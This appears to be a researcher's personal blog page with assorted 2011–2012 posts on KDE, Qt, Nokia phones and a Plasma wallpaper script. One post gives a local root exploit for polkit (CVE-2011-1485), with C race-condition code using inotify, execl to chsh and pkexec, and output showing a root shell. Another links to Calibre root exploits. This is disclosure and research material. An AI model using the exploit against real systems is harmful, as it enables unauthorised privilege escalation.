Stripe released a capture the flag, a security competition to exploit several contrived flaws. I solved all of them, and you can take a look at the solutions here. Here’s a video of a complete walkthrough:

February 25, 2012 · 3 comments


I just moved to Paris, which means I’m finally in the right proximity at the right time for attending an open source conference. I’m not sure what the scoop is with the Parisian KDE community — if it exists or is vibrant, if there’s camaraderie, or what the situation is. But, in case there is a good vibe brewing inside the Paris OSS community, what do you say we all band together to attend FOSDEM? Leave our city for Brussels in a festive caravan on Friday night (or possibly just a train) and come back Sunday night? If there’s interest, email me at jason [at] zx2c4 dot com or leave a comment below.

January 18, 2012 · (No comments)


TechRadar has decided that KDE is the most usable desktop compared to Gnome and Unity. A few days prior to the publication of this article, my friend John emailed me to write:

I’m using Kde on my computer at work and it is amazing. It’s improved so much that it’s now stable and highly usable.

I tried Unity (I’m using Ubuntu) and it was unusable. Gnome 3 was better but had massive issues with my second screen (dual screen setup with nvidia gpu running in twin view). Gnome 3 was still lacking in the productivity area though. Lxde worked great but I don’t want to use a desktop that looks and feels like Windows 95… Also Lxde has few apps so I had to pull in gnome or kde ones…

I also had issues with Ubuntu’s lightdm but switching to kdm fixed that. So far Kde is the only desktop that fully works, feels good, looks good and has apps for every task.

John

Sent from my phone

Finally folks are figuring out that KDE doesn’t suck anymore.


Update: Adam Weiss writes with a political comparison:

Gnome 3, Unity…they are like the George W. Bush of the non-KDE Linux desktop movement. Instead of taking care of the real issues on the desk, they went gallivanting off into the netbook world, dropping bombs all over the place and even to this day nobody can really figure out what the point of netbooks is…

December 18, 2011 · 66 comments


A few weeks ago, I posted an exploit and a bug report for a local root vulnerability in Calibre on Linux. The author, Kovid Goyal, became incensed, and rather than work with me to fix it, he insulted my colleagues and me. After each one of his fixes, I released a new exploit breaking the latest. It got a lot of social media hype, and was kind of a big deal. After several days of media frenzy and bad publicity, the stubborn developer finally bent to the advice of the chorus of leading security researchers, and the mount helper was removed entirely. In any case, the exploits show some neat race condition tricks that you might want to check out, using inotify and a toggler.

  • Hilarious bug report
  • Important news article
  • Social media hype
  • More social media hype
  • Compliment from famous hacker
  • oss-security mailing list discussion
  • Obscene praise from script-kiddie
  • First Exploit
  • Second Exploit
  • Third Exploit
  • Most Glorious Fourth Exploit

There’s plenty of technical explanation in the comments of the code. I was assigned CVE-2011-4124, CVE-2011-4125, and CVE-2011-4126, my first three CVEs.


After that, I decided to learn about linker bugs, so I reread Tavis’ excellent two write-ups on CVE-2010-3856 and CVE-2010-3847. I saw that there was room for writing a newer exploit based on his research that did not depend on having read access to SUID executables or having a cron daemon installed, so I wrote I Can’t Read and I Won’t Race You Either. The source has plenty of explanation. I also suggest reading Tim Brown’s excellent paper on linker bugs.

November 18, 2011 · 3 comments


So far as I can tell, changing your wallpaper (using the default wallpaper plugin, not any fancy scripted wallpaper plugins) from the command line in KDE4 is needlessly hard. I have to write a JavaScript file to a temporary location, make a dbus call to load it into an interactive window, and then use xdotool to simulate key strokes to run it. Jiminy Cricket. But below is how I do it. If there’s an easier way that I’ve missed, pleeeaassseee let me know in the comments.

set-wallpaper.sh:

    #!/bin/sh
    # Usage: set-wallpaper.sh /path/to/image
    js=$(mktemp)
    # Plasma desktop script: point the image wallpaper plugin of the first activity at the file
    cat > "$js" <<_EOF
    var wallpaper = "$1";
    var activity = activities()[0];
    activity.currentConfigGroup = new Array("Wallpaper", "image");
    activity.writeConfig("wallpaper", wallpaper);
    activity.writeConfig("userswallpaper", wallpaper);
    activity.reloadConfig();
    _EOF
    # Load the script into Plasma's interactive console, then run it and close the console window
    qdbus org.kde.plasma-desktop /App local.PlasmaApp.loadScriptInInteractiveConsole "$js" > /dev/null
    xdotool search --name "Desktop Shell Scripting Console – Plasma Desktop Shell" windowactivate key ctrl+e key ctrl+w
    rm -f "$js"

November 18, 2011 · 7 comments


Since it’s been 6 months since I reported it, I figure a responsible amount of time has passed for me to release a local root exploit for Linux that targets polkit-1 <= 0.101, CVE-2011-1485, a race condition in PolicyKit. I present you with PolicyKit Pwnage.

David Zeuthen of Redhat explains on the original bug report:

Briefly, the problem is that the UID for the parent process of pkexec(1) is read from /proc by stat(2)’ing /proc/PID. The problem with this is that this returns the effective uid of the process which can easily be set to 0 by invoking a setuid-root binary such as /usr/bin/chsh in the parent process of pkexec(1). Instead we are really interested in the real-user-id. While there’s a check in pkexec.c to avoid this problem (by comparing it to what we expect the uid to be – namely that of the pkexec.c process itself which is the uid of the parent process at pkexec-spawn-time), there is still a short window where an attacker can fool pkexec/polkitd into thinking that the parent process has uid 0 and is therefore authorized. It’s pretty hard to hit this window – I actually don’t know if it can be made to work in practice.

Well, here is, in fact, how it’s made to work in practice. There is, as he said, an attempted mitigation, and the way to trigger that mitigation path is something like this:

         $ sudo -u `whoami` pkexec sh
         User of caller (0) does not match our uid (1000)

Not what we want. So the trick is to execl to a suid at just the precise moment /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed, and execl to the suid binary as our very next instruction.

    	if (fork()) {
    		int fd;
    		char pid_path[1024];
    		sprintf(pid_path, "/proc/%i", getpid());
    		printf("[+] Configuring inotify for proper pid.\n");
    		close(0); close(1); close(2);
    		fd = inotify_init();
    		if (fd < 0)
    			perror("[-] inotify_init");
    		inotify_add_watch(fd, pid_path, IN_ACCESS);
    		read(fd, NULL, 0);

All the code up to this point makes this process block until /proc/PID is read, at which point it:

    		execl("/usr/bin/chsh", "chsh", NULL);

Which is suid. Meanwhile, in the other process, we launch pkexec, which skirts past the initial checks but gets fooled when we change the uid of the parent process:

    	} else {
    		sleep(1);
    		printf("[+] Launching pkexec.\n");
    		execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    	}

And it works:

     $ pkexec --version
     pkexec version 0.101
     $ gcc polkit-pwnage.c -o pwnit
     $ ./pwnit 
     [+] Configuring inotify for proper pid.
     [+] Launching pkexec.
     sh-4.2# whoami
     root
     sh-4.2# id
     uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
     sh-4.2#

This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which as of writing uses 0.101, has backported 0.102's bug fix. A way to check this is by looking at the mtime of /usr/bin/pkexec -- April 19, 2011 or later and you're out of luck. It's likely other distributions do the same. Fortunately, this exploit is clean enough that you can try it out without too much collateral.

So head on over and try it out! You can watch it in action over on YouTube as well:

Greets to Dan.

October 5, 2011 · 3 comments


The vcard export GUI feature of the contacts app on the N950 is broken. The console app “vcardconverter” successfully digests vcards, but you won’t be able to get them out. In my case, it converted some back to vcards, but failed on others. Unacceptable. For updating to today’s new firmware, I didn’t want to take a full backup of the tracker database, choosing instead to start fresh, suspecting that the new firmware fixes a lot of bugs. How, then, was I to back up my contacts, if I wasn’t going to back up the tracker? Vcard is the perfect neutral format for this.

So in a few lines of easy Qt/C++, I wrote vcardexport, a console application. It spits all the contacts out into one giant vcard file that can be reimported later with vcardconverter. Simple and easy. The biggest pain was getting the Aegis manifest correct, as the auto-generation tool is broken and documentation is kind of sparse, but it’s all sorted now.

You can browse the source here or download the latest deb from here.

Usage:

    $ /opt/vcardexport/bin/vcardexport > ~/vcards.vcf

Hope this is helpful. Enjoy the new firmware:

        image        [state    progress         transfer     flash speed]
    ---------------------------------------------------------------------
    [x] cert-sw      [finished   100 %       1 /       1 kB      NA     ]
    [x] cmt-2nd      [finished   100 %      95 /      95 kB      NA     ]
    [x] cmt-algo     [finished   100 %     789 /     789 kB      NA     ]
    [x] cmt-mcusw    [finished   100 %    6008 /    6008 kB    2933 kB/s]
    [x] xloader      [finished   100 %      23 /      23 kB      NA     ]
    [x] secondary    [finished   100 %      88 /      88 kB      NA     ]
    [x] kernel       [finished   100 %    2708 /    2708 kB    2024 kB/s]
    [x] rootfs       [finished   100 %  326205 /  326205 kB    7339 kB/s]
    [x] mmc          [finished   100 %  204747 /  204747 kB   17604 kB/s]
    Updating SW release
    Success

September 19, 2011 · 1 comment




Back in February I gave a workshop seminar on the basics of Qt — covering signals, slots, the metaobject system, QtGui, QtWebkit, and Qt Creator. We all built a fully functional web browser together, over the course of about an hour. The entirety was spoken just off the top of my head, so it might be slightly disorganized, but it was very well received. I know that following the presentation, at least two people went on to use Qt for major projects. Here’s the presentation:


Direct YouTube Link

Unfortunately, the projector in the room was broken, so we all had to huddle around my laptop, which actually had the effect of making the workshop much more intimate. If you’re interested, here’s the code we wrote together.

June 25, 2011 · (No comments)


The Nokia E52 is the most awesome phone ever made. It has a normal T9 keypad, GPS, 3G, Wifi, and runs Symbian. These are the features I need. Sure, Android and others are more modern operating systems, but there is no smartphone OS that has phones with T9 hardware keypads of this form factor, except for the E52. There is one problem: it’s not made anymore.

There are two models of the E52 — the E52-1, which has European 3G frequencies, and the E52-2, which has North American 3G frequencies. I’m looking for the E52-2.

If anyone knows the whereabouts of an E52-2, please inform me. I will bid high.

June 19, 2011 · 8 comments